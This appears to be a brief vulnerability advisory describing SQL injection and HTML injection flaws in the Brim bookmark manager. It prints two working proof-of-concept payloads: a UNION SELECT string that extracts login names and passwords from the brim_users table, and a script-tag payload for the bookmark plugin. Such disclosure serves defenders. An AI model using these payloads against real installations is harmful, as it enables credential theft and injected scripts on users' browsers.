|
Brim SQL Injection and HTML Injection Vulnerabilities
Attackers can exploit these issues via a browser. The following examples are available: To demonstrate the SQL-injection vulnerability, insert the following into any field on the search page: ' union select 1,2,3,4,concat(loginname,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17 from brim_users/* To demonstrate the HTML-injection vulnerability, add the following as the name for an action within the bookmark plugin: >"><script>alert("InjEctOr Team5")</script> |
|
|
Privacy Statement |
